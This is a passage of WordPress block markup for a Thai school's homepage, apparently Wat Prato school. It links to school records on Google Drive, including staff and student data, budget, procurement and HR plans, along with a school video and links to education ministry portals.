{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":418,\"width\":\"482px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:482px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" 